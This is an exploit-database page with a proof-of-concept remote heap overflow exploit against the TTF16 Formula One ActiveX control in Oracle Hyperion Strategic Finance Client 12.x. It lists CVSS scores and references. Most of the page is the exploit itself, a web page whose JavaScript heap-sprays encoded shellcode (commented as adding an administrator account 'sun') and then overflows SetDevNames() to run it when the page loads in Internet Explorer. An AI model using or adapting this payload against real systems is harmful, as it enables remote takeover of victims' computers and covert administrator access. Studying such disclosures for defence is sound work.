Oracle Hyperion SFC 12.x Remote Heap Overflow poc

2012.09.19
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<!-- Oracle Hyperion Strategic Finance Client 12.x Tidestone Formula One WorkBook OLE Control TTF16 (6.3.5 Build 1) SetDevNames() Remote Heap Overflow poc 99% stable,IE-no-dep. I think this control can be carried by other products, however 6.1 seems not vulnerable A copy of heapLib can be found here: http://retrogod.altervista.org/heapLib_js.html ActiveX Settings: Binary path: C:\WINDOWS\system32\TTF16.ocx CLSID: {B0475003-7740-11D1-BDC3-0020AF9F8E6E} ProgID: TTF161.TTF1.6 Safe for Scripting (IObjectSafety): True Safe for Initialization (IObjectSafety): True Andrea Micalizzi aka rgod --!> <!-- saved from url=(0014)about:internet --> <html> <head> <META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> <SCRIPT src="heapLib.js"></SCRIPT> </head> <body> <object classid='clsid:B0475003-7740-11D1-BDC3-0020AF9F8E6E' id='obj' width=640 height=480/> </object> <SCRIPT> var finalsize = 1200; var final = ''; var heap = null; var curr = 0; function x() { heap = new heapLib.ie(0x20000); var heapspray = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + //add Administrator, user: sun, pass: tzu "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" + "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" + "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" + "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" + "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" + "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" + "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" + "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" + "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" + "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" + "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" + "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" + "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" + "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" + "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" + "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" + "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" + "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" + "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" + "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" + "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" + "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" + "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" + "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" + "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" + "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" + "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" + "%u7734%u4734%u4570"); while(heapspray.length < 0x500) heapspray += unescape("%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606"); var heapblock = heapspray; while(heapblock.length < 0x40000) heapblock += heapblock; final = heapblock.substring(2, 0x40000 - 0x21); if(curr < 120) { spray(); } } function spray() { if(curr < finalsize - 1) { for(var i = 0; i < 120; i++) { heap.alloc(final); curr++; } } } </script> <script language='javascript' defer=defer> x(); var x =""; for (m=0;m<90;m++){x = x + unescape("%u0606%u0606");} try{ obj.SetDevNames(x,"",""); //don't touch obj.SetDevNames(x,x,""); obj.SetDevNames(x,x,x); } catch(e){ } obj.SetDevNames(x,x,""); </script>

References:

http://xforce.iss.net/xforce/xfdb/71163
http://www.securityfocus.com/bid/50565
http://www.saintcorporation.com/cgi-bin/exploit_info/oracle_hyperion_financial_mgmt_activex_heap
http://www.osvdb.org/76913
http://www.exploit-db.com/exploits/18092
http://secunia.com/advisories/46764
http://retrogod.altervista.org/9sg_ttf16.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top